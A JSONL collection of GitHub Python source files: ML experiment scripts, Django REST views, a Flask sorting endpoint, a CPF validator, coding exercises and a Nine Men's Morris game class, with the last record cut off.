+{"seq_id":"10231521627","text":"import sys\n\nsys.path.append(\"../\")\nfrom utils import *\nfrom models import *\nfrom dataloader import *\nimport argparse\nfrom attribution_utils import *\n\nimport params\n\nparser = params.parse_args()\nargs = parser.parse_args()\nargs = params.add_config(args) if args.config_file != None else args\nargs = vars(args)\nargs[\"dataset2\"] = args[\"dataset1\"]\nargs[\"noise_2\"] = args[\"noise_1\"]\nprint(args)\nfilename = f'logs/{args[\"dataset1\"]}/{args[\"model_type\"]}_lr_{args[\"lr1\"]}_noise_{args[\"noise_1\"]}_{args[\"model_type\"]}_{args[\"sched\"]}_seed_{args[\"seed\"]}_model-seed{args[\"model_seed\"]}/'\nprint (filename)\n\n\nseed_everything(args[\"seed\"])\npre_dict, ft_dict = return_loaders(args, get_frac=False, shuffle = False, aug = False)\nmodel_name = f\"{filename}{args['model_type']}_final.pt\"\n\n\ntry:\n assert (os.path.exists(filename))\nexcept:\n # Train the Model\n print (\"######### Training Model ###########\")\n model = get_model(args[\"model_type\"], NUM_CLASSES=10)\n model = model.cuda()\n train_loader = pre_dict[\"train_loader\"]\n optimizer = SGD(model.parameters(), lr=args[\"lr1\"], momentum=0.9, weight_decay=5e-4)\n\n scheduler, EPOCHS = get_scheduler_epochs(\"triangle\", optimizer, train_loader, max_epochs = 25)\n loss_fn = nn.CrossEntropyLoss()\n train_rets = train(model, train_loader, optimizer, scheduler, loss_fn, EPOCHS, patience = 5, eval_every = False, eval_loader= None, save_every = None, mask = None)\n #save model\n #make directory\n os.makedirs(filename, exist_ok=True)\n torch.save(model.state_dict(), model_name)\n\n#Load Model\nprint (\"######### Loading Saved Model ###########\")\nsaved_model = get_model(f\"{args['model_type']}\")\nsaved_model.load_state_dict(torch.load(model_name))\ntrain_loader = pre_dict[\"train_loader\"]\n\nprint (f\"Initial accuracy on training set = {eval(saved_model, train_loader, eval_mode = False)['accuracy']}\")\n\n\nnum_examples = 1000\n\n\n# channel_wise = channel, weight\n# objective = \"zero\", \"step\"\nrets = flip_preds(saved_model, \n loader = pre_dict[\"train_loader\"], \n example_type=args[\"example_type\"], \n noise_mask= torch.from_numpy(pre_dict[\"noise_mask\"]), \n rare_mask = torch.from_numpy(pre_dict[\"rare_mask\"]) if pre_dict[\"rare_mask\"] is not None else None, \n eval_post_edit=True, \n num_examples = num_examples, \n verbose = False,\n channel_wise = args[\"channel_wise\"],\n gaussian_noise=args[\"gaussian_noise\"],\n objective = args[\"objective\"],\n n_EoT=args[\"n_EoT\"])\n\n\nimport pickle\n\nwith open(f\"{filename}{args['example_type']}_flips_{args['channel_wise']}_wise_{args['objective']}_gaussian_{args['gaussian_noise']}.pickle\", \"wb\") as output_file:\n pickle.dump(rets, output_file)","repo_name":"pratyushmaini/localizing-memorization","sub_path":"experiments/neuron_flipping/analyze_flipping_difficulty.py","file_name":"analyze_flipping_difficulty.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"69"}
+{"seq_id":"37981655900","text":"# -*- coding: gb18030 -*-\n#\n\n\n\nfrom QuestDart import QuestDart\nimport csstatus\nimport csdefine\n\nclass QuestFamilyDart( QuestDart ):\n\n\n\tdef accept( self, player ):\n\t\t\"\"\"\n\t\tvirtual method.\n\t\t接任务,如果接任务失败了则返回False(例如玩家背包满了放不下任务道具)。\n\n\t\t@param player: instance of Role Entity\n\t\t@type player: Entity\n\t\t@return: BOOL\n\t\t@rtype: BOOL\n\t\t\"\"\"\n\t\t\n\t\tfamilyMB = player.family_getSelfFamilyEntity()\n\t\t\n\t\tif familyMB is None:\n\t\t\tplayer.statusMessage( csstatus.FAMILY_DART_NOT_EXIST )\n\t\t\treturn\n\t\t\n\t\tfamilyMB.queryDartCount( player.base, self.getID() )\n\t\t\n\n\tdef onAccept( self, player, tasks ):\n\t\t\"\"\"\n\t\tvirtual method.\n\t\t执行任务实际处理\n\t\t\"\"\"\n\t\tQuestDart.onAccept( self, player, tasks )\n\n\t\tfamilyMB = player.family_getSelfFamilyEntity()\n\t\t\n\t\tfamilyMB.addDartCount()\n\n","repo_name":"mudsave/csol2_enities_45541","sub_path":"cell/Resource/QuestModule/QuestFamilyDart.py","file_name":"QuestFamilyDart.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"24466299612","text":"# Números Favoritos: Modifique o seu programa do Exercício 6.2 para que cada pessoa possa ter mais de um\n# número favorito. Em seguida, apresente o nome de cada pessoa, juntamente com seus números favoritos.\n\nfavorite_number = {\n 'Kesia': {'primeiro número': 2,\n 'segundo número': 7,\n 'terceiro número': 79,},\n 'Roberto': {'primeiro número': 4,\n 'segundo número': 14,\n 'terceiro número': 158,},\n 'Lucio': {'primeiro número': 45,\n 'segundo número': 17,\n 'terceiro número': 56,},\n 'Eliene': {'primeiro número': 60,\n 'segundo número': 88,\n 'terceiro número': 56,},\n 'Renata': {'primeiro número': 88,\n 'segundo número': 79,\n 'terceiro número': 60,}\n}\nfor name, number in favorite_number.items():\n print(f'\\nNome: {name}')\n numero_1 = number['primeiro número']\n numero_2 = number['segundo número']\n numero_3 = number['terceiro número']\n print(f'\\tprimeiro número: {numero_1}')\n print(f'\\tsegundo número: {numero_2}')\n print(f'\\tterceiro número: {numero_3}')","repo_name":"rsmonteiro2021/execicios_python","sub_path":"cap_6/exercicios/6-10.py","file_name":"6-10.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"2279825142","text":"import string\r\n\r\n# cpf.py versao 2.1 20/12/2000\r\n# história:\r\n# 2.1: extraímos calcular_dc da função checar_cpf\r\n# 2.0: não aceita CPFs como 111.111.111-11, 222.222.222-22 etc.\r\n\r\ndef so_digitos(txt):\r\n\t#retorna a string eliminando tudo que não é digito\r\n\tdigitos = []\r\n\tfor car in txt:\r\n\t\tif car in string.digits: digitos.append(car)\r\n\treturn string.join(digitos,'')\r\n\r\ndef calcular_dc(num):\r\n\t#calcula os dígitos de controle a partir de uma string '123456789'\r\n\tmul = 1\r\n\tres = 0\r\n\tfor dig in num:\r\n\t\tres = res+mul*int(dig)\r\n\t\tmul = mul+1\r\n\tdc1 = res % 11\r\n\tif dc1 == 10:\r\n\t\tdc1 = 0\r\n\tmul = 1\r\n\tres = 0\r\n\tfor dig in num[1:]:\r\n\t\tres = res+mul*int(dig)\r\n\t\tmul = mul+1\r\n\tres = res+(9*dc1)\r\n\tdc2 = res % 11\r\n\tif dc2 == 10:\r\n\t\tdc2 = 0\r\n\treturn str(dc1)+str(dc2)\r\n\r\ndef checar_cpf(cpf):\r\n\t'''retorna cpf válido como 000.000.000-00 ou None se for inválido'''\r\n\tcpf = so_digitos(cpf)\r\n\tif len(cpf) != 11:\r\n\t\treturn None\r\n\tif cpf == cpf[0]*11:\r\n\t\t#000.000.000-00, 111.111.111-11 etc. são válidos mas não aceitamos\r\n\t\treturn None\r\n\tnum = cpf[:-2]\r\n\tdc = cpf[-2:]\r\n\tif dc == calcular_dc(num):\r\n\t\treturn '%s.%s.%s-%s' % (num[:3],num[3:6],num[6:9],dc)\r\n\telse:\r\n\t\treturn None\r\n\r\n","repo_name":"ramalho/propython","sub_path":"fundamentos/unittest/cpf.py","file_name":"cpf.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"pt","doc_type":"code","stars":46,"dataset":"github-code","pt":"69"}
+{"seq_id":"19519852221","text":"n, m = list(map(int, input().split()))\na = list(map(int, input().split()))\nb = list(map(int, input().split()))\nx = int(input())\n\nrows = [float('inf')] * (n + 1)\ncols = [float('inf')] * (m + 1)\nfor i in range(n):\n summ = 0\n for j in range(i, n):\n summ += a[j]\n l = j - i + 1\n rows[l] = min(rows[l], summ)\n\nfor i in range(m):\n summ = 0\n for j in range(i, m):\n summ += b[j]\n l = j - i + 1\n cols[l] = min(cols[l], summ)\n\nans = 0\nfor i in range(1, n + 1):\n for j in range(1, m + 1):\n cur = rows[i] * cols[j]\n if cur <= x:\n ans = max(ans, i * j)\nprint(ans)","repo_name":"zhulf0804/Coding.Python","sub_path":"codeforces/1060C_Maximum_Subrectangle.py","file_name":"1060C_Maximum_Subrectangle.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"69"}
+{"seq_id":"16614030828","text":"from flask import Flask, request\n\napp = Flask(__name__)\n\n\ndef flat_list(list_to_flat):\n if not isinstance(list_to_flat, list):\n yield list_to_flat\n else:\n for item in list_to_flat:\n yield from flat_list(item)\n\n\n@app.route(\"/\", methods=['POST'])\ndef bubbleSort():\n request_data = request.get_json()\n newSeq = list(flat_list(request_data['arr']))\n newSeq = list(filter(None, newSeq))\n n = len(newSeq)\n print(n)\n\n if n < 10000:\n for i in range(n - 1):\n flag = 0\n\n for j in range(n - 1):\n if newSeq[j] > newSeq[j + 1]:\n tmp = newSeq[j]\n newSeq[j] = newSeq[j + 1]\n newSeq[j + 1] = tmp\n flag = 1\n if flag == 0:\n break\n\n return(','.join(str(x) for x in newSeq))\n else:\n return(\"Array is too big\")\n\n\nif __name__ == '__main__':\n app.run(debug=True, host=\"0.0.0.0\", port=5000)\n","repo_name":"Zupirio/Platform-Engineer-Technical-Assignment","sub_path":"TaskB-C/bubbleSort.py","file_name":"bubbleSort.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"72553499420","text":"\"\"\"925r API v2 views.\"\"\"\nimport datetime\nimport dateutil\nfrom django.contrib.auth import models as auth_models\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.shortcuts import get_object_or_404\nfrom django.db.models import Q, Prefetch\nfrom rest_framework import mixins, permissions, viewsets, status\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom ninetofiver.api_v2 import serializers, filters\nfrom ninetofiver import models, feeds, calculation, redmine\nfrom ninetofiver.views import BaseTimesheetContractPdfExportServiceAPIView\n\n\nclass MeAPIView(APIView):\n \"\"\"Get the currently authenticated user.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n\n def get(self, request, format=None):\n entity = request.user\n data = serializers.MeSerializer(entity, context={'request': request}).data\n return Response(data)\n\n\nclass UserViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"List or retrieve users.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = serializers.UserSerializer\n filter_class = filters.UserFilter\n queryset = (auth_models.User.objects\n .exclude(is_active=False)\n .order_by('-date_joined')\n .select_related('userinfo'))\n\n\nclass LeaveTypeViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"List or retrieve leave types.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = serializers.LeaveTypeSerializer\n queryset = models.LeaveType.objects.all()\n\n\nclass ContractRoleViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"List or retrieve contract roles.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = serializers.ContractRoleSerializer\n queryset = models.ContractRole.objects.all()\n\n\nclass PerformanceTypeViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"List or retrieve performance types.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = serializers.PerformanceTypeSerializer\n queryset = models.PerformanceType.objects.all()\n\n\nclass LocationViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"List or retrieve locations.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = serializers.LocationSerializer\n queryset = models.Location.objects.all()\n\n\nclass HolidayViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"List or retrieve holidays.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = serializers.HolidaySerializer\n filter_class = filters.HolidayFilter\n queryset = models.Holiday.objects.all()\n\n\nclass ContractViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"List or retrieve contracts.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = serializers.ContractSerializer\n filter_class = filters.ContractFilter\n queryset = (models.Contract.objects.all()\n .select_related('company', 'customer')\n .prefetch_related(\n Prefetch('performance_types', queryset=(models.PerformanceType.objects\n .non_polymorphic())),\n Prefetch('attachments', queryset=(models.Attachment.objects\n .non_polymorphic())),\n Prefetch('contract_groups', queryset=(models.ContractGroup.objects\n .non_polymorphic())))\n .distinct())\n\n def get_queryset(self):\n return self.queryset.filter(contractuser__user=self.request.user)\n\n\nclass ContractUserViewSet(viewsets.ReadOnlyModelViewSet):\n \"\"\"List or retrieve contract 
users.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = serializers.ContractUserSerializer\n filter_class = filters.ContractUserFilter\n queryset = (models.ContractUser.objects.all()\n .select_related('contract', 'contract__customer', 'contract_role', 'user')\n .distinct())\n\n def get_queryset(self):\n return self.queryset.filter(user=self.request.user)\n\n\nclass TimesheetViewSet(viewsets.ModelViewSet):\n \"\"\"CRUD timesheets.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = serializers.TimesheetSerializer\n filter_class = filters.TimesheetFilter\n queryset = models.Timesheet.objects.all()\n\n def get_queryset(self):\n return self.queryset.filter(user=self.request.user)\n\n def perform_destroy(self, instance):\n if instance.status != models.STATUS_ACTIVE:\n raise ValidationError({'status': _('Only active timesheets can be deleted.')})\n return super().perform_destroy(instance)\n\n\nclass LeaveViewSet(viewsets.ModelViewSet):\n \"\"\"CRUD leave.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = serializers.LeaveSerializer\n filter_class = filters.LeaveFilter\n queryset = (models.Leave.objects.all()\n .select_related('leave_type')\n .prefetch_related('leavedate_set'))\n\n def get_queryset(self):\n return self.queryset.filter(user=self.request.user)\n\n def perform_destroy(self, instance):\n if instance.status not in [models.STATUS_DRAFT, models.STATUS_PENDING]:\n raise ValidationError({'status': _('Only draft/pending leave can be deleted.')})\n return super().perform_destroy(instance)\n\n\nclass WhereaboutViewSet(viewsets.ModelViewSet):\n \"\"\"CRUD whereabouts.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = serializers.WhereaboutSerializer\n filter_class = filters.WhereaboutFilter\n queryset = (models.Whereabout.objects.all()\n .select_related('location'))\n\n def get_queryset(self):\n return self.queryset.filter(timesheet__user=self.request.user)\n\n\nclass PerformanceViewSet(viewsets.ModelViewSet):\n \"\"\"CRUD performance.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = serializers.PerformanceSerializer\n filter_class = filters.PerformanceFilter\n queryset = (models.Performance.objects.all()\n .select_related('contract', 'contract__customer'))\n\n def get_queryset(self):\n return self.queryset.filter(timesheet__user=self.request.user)\n\n\nclass AttachmentViewSet(viewsets.ModelViewSet):\n \"\"\"CRUD attachments.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = serializers.AttachmentSerializer\n filter_class = filters.AttachmentFilter\n queryset = (models.Attachment.objects.all())\n\n def get_queryset(self):\n return self.queryset.filter(user=self.request.user)\n\n def perform_destroy(self, instance):\n # Don't allow deleting of attachment if the attached leave/timesheet is already closed/approved/rejected\n if (models.Timesheet.objects.filter(~Q(status=models.STATUS_ACTIVE), attachments=instance).count() or\n models.Leave.objects.filter(Q(status=models.STATUS_APPROVED) | Q(status=models.STATUS_REJECTED), attachments=instance)):\n raise ValidationError(_('Attachments linked to finalized timesheets or leaves cannot be deleted.'))\n return super().perform_destroy(instance)\n\n\nclass TimesheetContractPdfDownloadAPIView(BaseTimesheetContractPdfExportServiceAPIView):\n \"\"\"Export a timesheet contract to PDF.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n\n def 
resolve_user_timesheet_contracts(self, context):\n \"\"\"Resolve the users, timesheets and contracts for this export.\"\"\"\n user = context['view'].request.user\n timesheet = get_object_or_404(models.Timesheet, pk=context.get('timesheet_pk', None), user=user)\n contract = get_object_or_404(models.Contract.objects.distinct(), pk=context.get('contract_pk', None))\n return [[user, timesheet, contract]]\n\n\nclass LeaveFeedAPIView(APIView):\n \"\"\"Leave ICS feed.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n\n def get(self, request, format=None):\n return feeds.LeaveFeed().__call__(request)\n\n\nclass UserLeaveFeedAPIView(APIView):\n \"\"\"User-specific leave ICS feed.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n\n def get(self, request, user_username=None, format=None):\n username = request.parser_context['kwargs'].get('user_username', None)\n user = get_object_or_404(auth_models.User, username=username, is_active=True) if username else request.user\n return feeds.UserLeaveFeed().__call__(request, user=user)\n\n\nclass WhereaboutFeedAPIView(APIView):\n \"\"\"Whereabout ICS feed.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n\n def get(self, request, format=None):\n return feeds.WhereaboutFeed().__call__(request)\n\n\nclass UserWhereaboutFeedAPIView(APIView):\n \"\"\"User-specific whereabout ICS feed.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n\n def get(self, request, user_username=None, format=None):\n username = request.parser_context['kwargs'].get('user_username', None)\n user = get_object_or_404(auth_models.User, username=username, is_active=True) if username else request.user\n return feeds.UserWhereaboutFeed().__call__(request, user=user)\n\n\nclass PerformanceImportAPIView(APIView):\n \"\"\"Gets performances from external sources and returns them to be imported.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n\n def get(self, request, format=None):\n from_date = request.query_params.get('from', str(datetime.date.today()))\n until_date = request.query_params.get('until', str(datetime.date.today()))\n\n data = {\n 'count': 0,\n 'previous': None,\n 'next': None,\n 'results': [],\n }\n\n # Redmine\n redmine_data = redmine.get_user_redmine_performances(request.user, from_date=from_date, to_date=until_date)\n data['results'] += redmine_data\n data['count'] = len(data['results'])\n\n return Response(data)\n\n\nclass RangeAvailabilityAPIView(APIView):\n \"\"\"Get availability for all active users.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n\n def get(self, request, format=None):\n \"\"\"Defines the entrypoint of the retrieval.\"\"\"\n from_date = dateutil.parser.parse(request.query_params.get('from', None)).date()\n until_date = dateutil.parser.parse(request.query_params.get('until', None)).date()\n\n users = auth_models.User.objects.filter(is_active=True)\n users = users if not request.query_params.get('user', None) else \\\n users.filter(id__in=list(map(int, request.query_params.get('user', None).split(','))))\n\n data = calculation.get_availability(users, from_date, until_date, serialize=True)\n\n return Response(data, status=status.HTTP_200_OK)\n\n\nclass RangeInfoAPIView(APIView):\n \"\"\"Calculates and returns information for a given date range.\"\"\"\n\n permission_classes = (permissions.IsAuthenticated,)\n\n def get(self, request, format=None):\n \"\"\"Get date range information.\"\"\"\n user = request.user\n\n from_date = dateutil.parser.parse(request.query_params.get('from', 
None)).date()\n until_date = dateutil.parser.parse(request.query_params.get('until', None)).date()\n daily = request.query_params.get('daily', 'false') == 'true'\n detailed = request.query_params.get('detailed', 'false') == 'true'\n summary = request.query_params.get('summary', 'false') == 'true'\n\n data = calculation.get_range_info([user], from_date, until_date, daily=daily, detailed=detailed,\n summary=summary, serialize=True)\n data = data[user.id]\n\n return Response(data)","repo_name":"kalmanolah/925r","sub_path":"ninetofiver/api_v2/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11858,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"69"}
+{"seq_id":"71342546779","text":"import numpy as np\nimport pandas as pd\n\ndef entropy(target_col):\n elements, counts = np.unique(target_col, return_counts=True)\n entropy_val = np.sum([(-counts[i]/np.sum(counts)) * np.log2(counts[i]/np.sum(counts)) for i in range(len(elements))])\n #print(target_col,entropy_val\n print(entropy_val)\n return entropy_val\n\ndef InfoGain(data, split_attribute_name, target_name=\"yes\"):\n total_entropy = entropy(data[target_name])\n vals, counts = np.unique(data[split_attribute_name], return_counts=True)\n weighted_entropy = np.sum([(counts[i]/np.sum(counts)) * entropy(data.where(data[split_attribute_name]==vals[i]).dropna()[target_name]) for i in range(len(vals))])\n information_gain = total_entropy - weighted_entropy\n print(data,\"\\n\",split_attribute_name,target_name,information_gain,\"\\n\")\n return information_gain\n\ndef ID3(data, original_data, features, target_attribute_name=\"Infected\", parent_node_class=None):\n if len(np.unique(data[target_attribute_name])) <= 1:\n return np.unique(data[target_attribute_name])[0]\n elif len(data)==0:\n return np.unique(original_data[target_attribute_name])[np.argmax(np.unique(original_data[target_attribute_name], return_counts=True)[1])]\n elif len(features) == 0:\n return parent_node_class \n else:\n parent_node_class = np.unique(data[target_attribute_name])[np.argmax(np.unique(data[target_attribute_name], return_counts=True)[1])]\n item_values = [InfoGain(data, feature, target_attribute_name) for feature in features]\n best_feature_index = np.argmax(item_values)\n best_feature = features[best_feature_index]\n tree = {best_feature: {}}\n features = [i for i in features if i != best_feature]\n for value in np.unique(data[best_feature]):\n sub_data = data.where(data[best_feature] == value).dropna()\n subtree = ID3(sub_data, data, features, target_attribute_name, parent_node_class)\n tree[best_feature][value] = subtree\n return tree\n\n# Example usage:\ndata = pd.read_csv('CovidDataset.csv') # Replace with your dataset\ntarget_attribute = 'Infected'\nfeatures = list(data.columns)\nfeatures.remove(target_attribute)\ntree = ID3(data, data, features)\nprint(tree)\n","repo_name":"mchinmayarao/ML_Lab","sub_path":"DecisionTree2.py","file_name":"DecisionTree2.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"35698389157","text":"from cgitb import text\nimport json\nfrom channels.generic.websocket import AsyncWebsocketConsumer\nimport asyncio\n\nfrom asgiref.sync import async_to_sync\n\nclass ChatConsumer(AsyncWebsocketConsumer):\n async def connect(self):\n self.user = self.scope[\"user\"]\n print(\"USER\",self.user.username)\n\n if self.user.is_authenticated:\n # accept connection if user is logged in\n await self.accept()\n\n else:\n # don't accept connection if user is not logged in \n await self.close()\n \n\n self.room_name = self.user.username\n self.room_group_name = self.room_name\n print(\"room_name\",self.room_name)\n print(\"room_group_name\",self.room_group_name)\n\n # Join room group\n await self.channel_layer.group_add(\n self.room_group_name,\n self.channel_name\n )\n\n # await self.accept()\n self.connected = True\n\n await self.send(text_data=json.dumps({\n 'type': 'websocket.accept',\n 'message': str(self.user.username) + '. You are now connected'\n }))\n\n # while self.connected:\n # await asyncio.sleep(2)\n # await self.send(text_data=json.dumps({\n # 'type': 'websocket.accept',\n # 'message': 'You are now connected'\n # }))\n\n async def disconnect(self, close_code):\n # Leave room group\n await self.channel_layer.group_discard(\n self.room_group_name,\n self.channel_name\n )\n\n async def receive(self, text_data):\n\n # print(\"MESSAGE\",text_data)\n # text_data_json = json.loads(text_data)\n message = text_data\n\n\n print(\"MESSAGE\",message)\n\n # Send message to room group\n await self.channel_layer.group_send(\n self.room_group_name,\n {\n 'type': 'chat_message',\n 'message': message\n }\n )\n\n async def chat_message(self, event):\n message = event['message']\n\n # Send message to WebSocket\n await self.send(text_data=json.dumps({\n 'message': message\n }))","repo_name":"Arslaan0124/SentrendR","sub_path":"crawler/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"23742555159","text":"from collections import deque\na = input()\nn = int(input())\nq = deque(a)\n\nfor i in range(n):\n plan = input()\n plan = deque(plan)\n for x in plan:\n if x in q:\n if x != q.popleft():\n print(f'#{i + 1} NO')\n break\n else:\n if len(q) == 0:\n print(f'#{i + 1} YES')\n else:\n print(f'#{i + 1} NO')\n","repo_name":"sangjun0412/codingTest_base","sub_path":"Total_Algorithm/교육과정설계.py","file_name":"교육과정설계.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"11722381501","text":"#%%\nfrom data import get_x_y\nfrom pathlib import Path\nfrom playlists import spotify_conn #, get_playlists_from_file\nimport numpy as np\nimport json\nfrom sorter import alphanum_key\n# import pickle\nimport pickle5 as pickle\nimport pandas as pd\nfrom tqdm import tqdm\n# from data import get_features\nfrom playlists import cut_songs_modified\n#%%\nfile_dir = Path(__file__).parent\ndata_dir = file_dir / 'data'\nspotify = spotify_conn(file_dir / 'keys.json')\n#%%\nwith open('tracks_df.pkl', 'rb') as handle:\n tracks_df = pickle.load(handle)\n\ntracks_df = tracks_df.drop(['artist_name', 'track_name', 'type', 'id', 'uri', 'track_href', 'analysis_url'], axis = 1)\ndef get_playlists_from_file(path, conn):\n # Open path to json file, load json data\n data = json.load(open(path))\n dataframe_storage = []\n for ind, playlist in enumerate(data['playlists']):\n # reset track_uri_arr\n tracks = []\n # print(\"index is \", ind)\n if playlist[\"tracks\"]:\n for track in playlist[\"tracks\"]:\n tracks.append(tracks_df.loc[track[\"track_uri\"]].tolist())\n dataframe_storage.append(pd.DataFrame(tracks))\n return dataframe_storage\n\n#%%\narray_df = []\nfor file_path in tqdm(sorted(data_dir.glob('mpd.slice.*.json'), key=alphanum_key)):\n # print(\"File:\", file_path)\n file_dfs = get_playlists_from_file(file_path, spotify)\n array_df += file_dfs\n\nwith open('all_data_noNA.pkl', 'wb') as handle:\n pickle.dump(array_df, handle)\nwith open('all_data_noNA.pkl', 'rb') as handle:\n read_array_df = pickle.load(handle)","repo_name":"rbarden3/song_prediction","sub_path":"generate_data_df.py","file_name":"generate_data_df.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"26242095090","text":"from connected import connected, muehlen, offene_muehlen\n\n\n\ndef steintostring(i):\n if i==-1:\n return 'X'\n elif i==1:\n return 'O'\n elif i==0:\n return '-'\n\n\nclass muehle():\n\n\n def __init__(self, steine=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0], phase=1, amzug=1, zuege=0,sieger=0,wert=0):\n self.steine = steine\n self.phase=phase #1: setzen, 2:ziehen\n self.amzug=amzug #1:weiß, -1: schwarz\n self.zuege=zuege\n self.sieger=sieger\n self.wert=wert\n\n\n\n\n def diesemuehlegibtes(self, muehl, amzug):\n if self.steine[muehl[0]]==amzug and self.steine[muehl[1]]==amzug and self.steine[muehl[2]]==amzug:\n return True\n else:\n return False\n\n\n def istteileinermuehle(self, nehmen):\n for muehl in muehlen:\n if self.diesemuehlegibtes(muehl, self.amzug*(-1)) and (nehmen in muehl):\n return True\n else:\n return False\n\n\n def muehlegebaut(self, stein, nehmen):\n for muehl in muehlen:\n if self.diesemuehlegibtes(muehl, self.amzug) and (stein in muehl) and not self.istteileinermuehle(nehmen):\n return True\n return False\n\n\n def toString(self):\n ausdruck=''\n ausdruck+=f'{steintostring(self.steine[1])}--------{steintostring(self.steine[2])}--------{steintostring(self.steine[3])}\\n'\n ausdruck+=f'| | |\\n'\n ausdruck+=f'| | |\\n'\n ausdruck+=f'| {steintostring(self.steine[9])}-----{steintostring(self.steine[10])}-----{steintostring(self.steine[11])} |\\n'\n ausdruck+=f'| | | | |\\n'\n ausdruck+=f'| | | | |\\n'\n ausdruck+=f'| | {steintostring(self.steine[17])}--{steintostring(self.steine[18])}--{steintostring(self.steine[19])} | |\\n'\n ausdruck+=f'| | | | | |\\n'\n ausdruck+=f'| | | | | |\\n'\n ausdruck+=f'{steintostring(self.steine[8])}--{steintostring(self.steine[16])}--{steintostring(self.steine[24])} {steintostring(self.steine[20])}--{steintostring(self.steine[12])}--{steintostring(self.steine[4])}\\n'\n ausdruck+=f'| | | | | |\\n'\n ausdruck+=f'| | | | | |\\n'\n ausdruck+=f'| | {steintostring(self.steine[23])}--{steintostring(self.steine[22])}--{steintostring(self.steine[21])} | |\\n'\n ausdruck+=f'| | | | |\\n'\n ausdruck+=f'| | | | |\\n'\n ausdruck+=f'| {steintostring(self.steine[15])}-----{steintostring(self.steine[14])}-----{steintostring(self.steine[13])} |\\n'\n ausdruck+=f'| | |\\n'\n ausdruck+=f'| | |\\n'\n ausdruck+=f'{steintostring(self.steine[7])}--------{steintostring(self.steine[6])}--------{steintostring(self.steine[5])}\\n'\n ausdruck += f'Phase: {self.phase}, zuege: {self.zuege}, sieger: {self.sieger}, wert: {self.wert} '\n return ausdruck\n\n\n\n def weristsieger(self):\n schwarz=0\n weis=0\n for i in self.steine:\n if i==-1:\n schwarz+=1\n elif i==1:\n weis+=1\n if schwarz <=2:\n return 1\n elif weis <=2:\n return -1\n for con in connected:\n if self.steine[con[0]]==self.amzug and self.steine[con[1]]==0:\n return 0\n if self.steine[con[1]]==0 and self.steine[con[0]]==self.amzug:\n return 0\n return self.amzug*(-1)\n\n\n\n\n\n\n\n def bewertung(self, manuel=False):\n gewicht_stein=5\n gewicht_zue_muehle=3\n gewicht_offene_muehle=4\n wert=0\n if self.phase==2:\n self.sieger=self.weristsieger()\n if self.sieger!=0:\n return 100000000*self.sieger\n for i in self.steine:\n wert+=gewicht_stein*i\n for muehl in muehlen:\n if self.diesemuehlegibtes(muehl, 1):\n wert += gewicht_zue_muehle\n elif self.diesemuehlegibtes(muehl, -1):\n wert -= gewicht_zue_muehle\n if self.phase==1:\n for farbe in [-1,1]:\n for muehl in muehlen:\n if muehl[0]==farbe and muehl[1]==farbe and muehl[2]==0:\n wert += farbe* gewicht_offene_muehle\n if 
